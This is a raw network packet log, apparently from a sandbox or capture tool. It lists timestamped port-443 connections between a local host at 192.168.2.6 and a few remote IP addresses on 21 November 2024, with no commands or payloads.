                                                                                                                                                                                                            Nov 21, 2024 15:17:22.796072006 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.796103001 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.796159983 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.796190977 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.796209097 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.796348095 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.803749084 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.803767920 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.803853989 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.803864956 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.803879976 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.803919077 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.803953886 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.803983927 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.803983927 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.804012060 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.804250002 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.812824011 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.812843084 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.812907934 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.812918901 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.813427925 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.820029974 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.820049047 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.820164919 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.820182085 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.820283890 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.821773052 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.821790934 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.821845055 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.821855068 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.822052002 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.830899000 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.830944061 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.830998898 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.831007957 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.831041098 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.831065893 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.834984064 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.835012913 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.835073948 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.835091114 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.835118055 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.835211992 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.839140892 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.839164972 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.839210987 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.839224100 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.839243889 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.839262962 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.844377995 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.844409943 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.844515085 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.844515085 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.844527960 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.844650984 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.847079039 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.847122908 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.847192049 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.847201109 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.847366095 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.856220961 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.856242895 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.856314898 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.856327057 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.856363058 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.857206106 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.865911007 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.865947962 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.865984917 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.866000891 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.866051912 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.866051912 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.997819901 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.997848034 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.997921944 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.997955084 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.997977018 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:22.998101950 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.006572008 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.006592989 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.006660938 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.006670952 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.006695986 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.006716967 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.008552074 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.008594990 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.008630991 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.008645058 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.008714914 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.008714914 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.014332056 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.014362097 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.014508963 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.014519930 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.014605045 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.017026901 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.017047882 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.017086029 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.017103910 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.017147064 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.017147064 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.023211956 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.023241043 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.023293018 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.023309946 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.023333073 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.023360968 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.026650906 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.026669979 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.026920080 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.026920080 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.026940107 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.027029991 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.031984091 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.032002926 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.032085896 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.032094955 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.032136917 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.035243034 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.035260916 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.035340071 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.035351038 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.035636902 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.040380955 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.040401936 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.040486097 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.040496111 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.040606976 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.044433117 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.044486046 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.044599056 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.044620037 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.044629097 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.044687033 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.044697046 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.044783115 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.045815945 CET49755443192.168.2.652.149.20.212
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.045829058 CET4434975552.149.20.212192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.049182892 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.049211025 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.049252987 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.049262047 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.049295902 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.049313068 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.053436041 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.053455114 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.053601980 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.053601980 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.053617001 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.053709984 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.057106018 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.057128906 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.057173014 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.057183981 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.057214975 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.057230949 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.062980890 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.063007116 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.063044071 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.063054085 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.063086987 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.063189983 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.072701931 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.072722912 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.072874069 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.072885036 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.073138952 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.208676100 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.208713055 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.208761930 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.208780050 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.208815098 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.208833933 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.217165947 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.217202902 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.217253923 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.217261076 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.217304945 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.222419024 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.222450018 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.222568035 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.222568035 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.222580910 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.222686052 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.224893093 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.224919081 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.224963903 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.224972010 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.225002050 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.225028038 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.231245995 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.231262922 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.231331110 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.231338024 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.231534958 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.233642101 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.233659983 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.233700037 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.233709097 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.233747959 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.233767033 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.239840031 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.239857912 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.239948034 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.239965916 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.240078926 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.242511988 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.242531061 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.242594004 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.242604017 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.242674112 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.242679119 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.242688894 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.242731094 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.249161005 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.249192953 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.249238968 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.249248028 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.249278069 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.249311924 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.257339954 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.257375956 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.257524967 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.257539988 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.257671118 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.263364077 CET49740443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.263381958 CET44349740150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.267477989 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.267503977 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.267580032 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.267596006 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.267632008 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.267756939 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.275696993 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.275717974 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.275829077 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.275829077 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.275840044 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.276060104 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.284847975 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.284866095 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.284980059 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.284980059 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.284992933 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.285181046 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.401206970 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.401336908 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.402833939 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.402844906 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.403179884 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.404467106 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.404572010 CET49748443192.168.2.6188.114.97.3
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.404581070 CET44349748188.114.97.3192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.432842016 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.432863951 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.432970047 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.432970047 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.432987928 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.433260918 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.440917015 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.440936089 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.441034079 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.441041946 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.441220999 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.441220999 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.450392008 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.450412035 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.450475931 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.450498104 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.450556993 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.459677935 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.459703922 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.459773064 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.459773064 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.459793091 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.459909916 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.469079018 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.469101906 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.469152927 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.469167948 CET44349741150.171.28.10192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.469213009 CET49741443192.168.2.6150.171.28.10
                                                                                                                                                                                                            Nov 21, 2024 15:17:23.469213009 CET49741443192.168.2.6150.171.28.10
